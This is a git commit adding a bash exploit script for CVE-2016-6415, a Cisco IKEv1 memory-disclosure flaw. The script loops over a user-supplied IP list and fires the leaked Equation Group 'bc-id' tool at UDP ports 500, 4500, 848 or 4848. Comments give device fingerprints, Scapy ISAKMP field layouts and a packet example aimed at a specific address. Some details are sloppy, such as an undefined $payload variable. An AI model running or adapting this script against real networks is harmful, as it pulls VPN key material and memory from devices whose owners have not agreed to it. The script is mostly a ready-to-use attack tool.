CVE-2016-6415 cisco IKE Information Disclosure

nixawk · nixawk · commit 4ee6236ec468 · 2016-10-09T00:05:19.000-05:00
diff --git a/cisco-CVE-2016-6415.sh b/cisco-CVE-2016-6415.sh
@@ -0,0 +1,165 @@
+#!/bin/bash
+
+# https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
+# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
+# https://tools.cisco.com/security/center/selectIOSVersion.x
+# https://isakmpscan.shadowserver.org/
+# https://twitter.com/marcan42/status/766346343405060096
+# https://nmap.org/nsedoc/scripts/ike-version.html
+# http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
+# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415
+
+# [+] ---- Fingerprint: ---- [+]
+# cisco pix
+# cisco pix 6
+# cisco pix 7
+#
+# 500/udp open  isakmp  udp-response Cisco VPN Concentrator 3000 4.0.7
+# Cisco Systems, Inc./VPN 3000 Concentrator Version 4.7.2.L built by vmurphy on Jun 11 2007 14:07:29
+# Vendor: Cisco Systems, Inc.
+# Cisco Systems, Inc. 12.2
+# Cisco Systems, Inc. 12.4
+# Cisco Systems, Inc. 15.5
+# Cisco Systems pix
+# Cisco VPN Concentrator
+
+function exploit
+{
+
+if [ -z "$1" ]; then
+  echo "[*] please set a valid ip, ex: 8.8.8.8";
+  exit 0;
+fi
+
+if [ -z "$2" ]; then
+  echo "[*] please set a valid port, ex: 500, 4500"
+fi
+
+ip="$1"
+port="$2"
+
+echo -e "[*] sending [$payload] -> $ip: $port"
+timeout 6s ./bc-id -t $ip -p $port -I "sendpacket.raw"
+
+}
+
+# UDP port 500
+# UDP port 4500, NAT Traversal (NAT-T)
+# UDP port 848,  Group Domain of Interpretation (GDOI)
+# UDP port 4848, GDOI NAT-T
+
+function main
+{
+  echo "1) exploit port 500";
+  echo "2) exploit port 4500";
+  echo "3) exploit port 848";
+  echo "4) exploit port 4848";
+
+  read -p "[*] please make a choice: " choice
+  read -p "[*] please set a valid iplist: " iplist
+
+  for ip in $(cat $iplist); do
+    case $choice in
+        1) exploit $ip 500;;
+        2) exploit $ip 4500;;
+        3) exploit $ip 848;;
+        4) exploit $ip 4848;;
+    esac
+  done
+}
+
+main
+
+# --- port: 500  ---
+# --- port: 4848 ---
+
+# -------------------------------------------------------------------------
+# Internet Key Exchange Version 1 (IKEv1)
+# http://www.omnisecu.com/tcpip/ikev1-main-aggressive-and-quick-mode-message-exchanges.php
+#
+# IKEv1 Protocol, IKEv1 message exchange, IKEv1 Main, Aggressive and Quick Modes
+#
+# IP/UDP/ISAKMP/ISAKMP_payload_Proposal/ISAKMP_payload_Transform
+#
+#
+#
+# ISAKMP     : ISAKMP
+# ISAKMP_class : None
+# ISAKMP_payload : ISAKMP payload
+# ISAKMP_payload_Hash : ISAKMP Hash
+# ISAKMP_payload_ID : ISAKMP Identification
+# ISAKMP_payload_KE : ISAKMP Key Exchange
+# ISAKMP_payload_Nonce : ISAKMP Nonce
+# ISAKMP_payload_Proposal : IKE proposal
+# ISAKMP_payload_SA : ISAKMP SA
+# ISAKMP_payload_Transform : IKE Transform
+# ISAKMP_payload_VendorID : ISAKMP Vendor ID
+#
+# ---------------------------------------------------------
+# >>> ls(ISAKMP)
+# init_cookie : StrFixedLenField          = ('')
+# resp_cookie : StrFixedLenField          = ('')
+# next_payload : ByteEnumField             = (0)
+# version    : XByteField                = (16)
+# exch_type  : ByteEnumField             = (0)
+# flags      : FlagsField (8 bits)       = (0)
+# id         : IntField                  = (0)
+# length     : IntField                  = (None)
+#
+#
+# ---------------------------------------------------------
+# >>> ls(ISAKMP_payload)
+# next_payload : ByteEnumField             = (None)
+# res        : ByteField                 = (0)
+# length     : FieldLenField             = (None)
+# load       : StrLenField               = ('')
+#
+#
+# ---------------------------------------------------------
+# >>> ls(ISAKMP_payload_Hash)
+# next_payload : ByteEnumField             = (None)
+# res        : ByteField                 = (0)
+# length     : FieldLenField             = (None)
+# load       : StrLenField               = ('')
+#
+#
+# ---------------------------------------------------------
+# >>> ls(ISAKMP_payload_Proposal)
+# next_payload : ByteEnumField             = (None)
+# res        : ByteField                 = (0)
+# length     : FieldLenField             = (None)
+# proposal   : ByteField                 = (1)
+# proto      : ByteEnumField             = (1)
+# SPIsize    : FieldLenField             = (None)
+# trans_nb   : ByteField                 = (None)
+# SPI        : StrLenField               = ('')
+# trans      : PacketLenField            = (<Raw  |>)
+#
+# ---------------------------------------------------------
+# >>> ls(ISAKMP_payload_SA)
+# next_payload : ByteEnumField             = (None)
+# res        : ByteField                 = (0)
+# length     : FieldLenField             = (None)
+# DOI        : IntEnumField              = (1)
+# situation  : IntEnumField              = (1)
+# prop       : PacketLenField            = (<Raw  |>)
+#
+# ---------------------------------------------------------
+# >>> ls(ISAKMP_payload_Transform)
+# next_payload : ByteEnumField             = (None)
+# res        : ByteField                 = (0)
+# length     : ShortField                = (None)
+# num        : ByteField                 = (None)
+# id         : ByteEnumField             = (1)
+# res2       : ShortField                = (0)
+# transforms : ISAKMPTransformSetField   = (None)
+#
+# =========================================================
+# https://github.com/secdev/scapy/wiki/Contrib:-RegressionTests
+# http://www.secdev.org/projects/UTscapy/
+#
+# transform = ISAKMP_payload_Transform(num=1, transforms=[('Encryption','CAST-CBC'), ('Hash', 'SHA'), ('Authentication', 'PSK'), ('GroupDesc', '1536MODPgr'), ('KeyLength', 256), ('LifeType', 'Seconds'), ('LifeDuration', 86400L)])
+# proposal = ISAKMP_payload_Proposal(SPIsize=4, trans_nb=1, SPI='\x2e\xbf\x19\x3c', trans=transform)
+# security_association = ISAKMP_payload_SA(prop=proposal)
+# isakmp = ISAKMP(init_cookie='\x3e\x35\xc7\x07\x29\xdf\xed\xef', resp_cookie='\x00\x00\x00\x00\x00\x00\x00\x00', next_payload=1, version=16, exch_type=2)
+# ike = IP(dst="79.190.52.2")/UDP(dport=500)/isakmp/security_association
